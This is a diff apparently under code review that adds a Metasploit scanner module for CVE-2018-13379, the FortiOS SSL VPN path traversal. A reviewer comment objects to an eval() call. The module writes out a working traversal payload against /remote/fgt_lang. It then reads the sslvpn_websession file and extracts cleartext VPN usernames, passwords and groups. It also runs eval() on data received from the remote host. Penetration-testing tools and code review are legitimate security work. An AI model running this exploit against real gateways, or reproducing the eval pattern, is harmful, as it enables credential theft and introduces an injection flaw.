modules/auxiliary/scanner/http/fortios_vpnssl_traversal_leak.rb

```diff
@@ -0,0 +1,184 @@
+        A path traversal vulnerability in the FortiOS SSL VPN web portal may allow an unauthenticated
+        attacker to download FortiOS system files through specially crafted HTTP resource requests.
+        This exploit read `/dev/cmdb/sslvpn_websession` file, this file contains login and passwords in (clear/text).
+        This vulnerability affect (FortiOS 5.4.6 to 5.4.12, FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4).
+      },
+      'References' => [
+        ['CVE', '2018-13379'],
+        ['URL', 'https://www.fortiguard.com/psirt/FG-IR-18-384'],
+        ['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379'],
+        ['EDB', '47287'],
+        ['EDB', '47288']
+      ],
+      'Author' => [
+        'lynx (Carlos Vieira)',         # initial module author from edb
+        'mekhalleh (RAMELLA Sébastien)' # this module author (Zeop Entreprise)
+      ],
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => {
+        'RPORT' => 443,
+        'SSL' => true
+      },
+    ))
+
+    register_options([
+      OptEnum.new('DUMP_FORMAT', [true,  'Dump format.', 'raw', ['raw', 'ascii']]),
+      OptBool.new('STORE_CRED', [false, 'Store credential into the database.', true]),
+      OptBool.new('STORE_LOOT', [false, 'Store dump in loot.', false]),
+      OptString.new('TARGETURI', [true, 'Base path', '/remote'])
+    ])
+  end
+
+  def execute_request
+    payload = '/../../../..//////////dev/cmdb/sslvpn_websession'
+
+    uri = normalize_uri(target_uri.path, 'fgt_lang')
+    begin
+      response = send_request_cgi({
+        'method' => 'GET',
+        'uri' => uri,
+        'vars_get' => {
+          'lang' => payload
+        }
+      })
+
+    rescue StandardError => e
+      print_error(message("#{e.message}"))
+      return nil
+    end
+
+    if response && response.code == 200
+      if response.body =~ /var fgt_lang/
+        print_good(message('Vulnerable!'))
+
+        report_vuln(
+          host: @ip_address,
+          name: name,
+          refs: references,
+        )
+
+        return response.body if datastore['STORE_CRED'] == true
+      end
+    elsif response && response.code == 404
+      print_error(message('NOT Vulnerable!'))
+    end
+
+    return nil
+  end
+
+  def message(msg)
+    "#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}"
+  end
+
+  def parse_config(chunk)
+    credential = {
+      ip: @ip_address,
+      port: datastore['RPORT'],
+      service_name: @proto,
+      user: read_param(chunk[36..421]),
+      password: read_param(chunk[422..550]),
+      group: read_param(chunk[551..622]),
+      profile: read_param(chunk[623..698])
+    }
+  end
+
+  def read_param(param)
+    output = ''
+    param.each_char do |c|
+      break if c == "\x00"
+      output << c
+    end
+    return output
+  end
+
+  def report_creds(creds)
+    creds.each do |cred|
+      cred = eval(cred)
```

Comment:
Using `eval()` is strongly discouraged, especially when the evaluated data is from a remote host.

From a quick read of the code, I'm not sure why `eval()` is necessary here.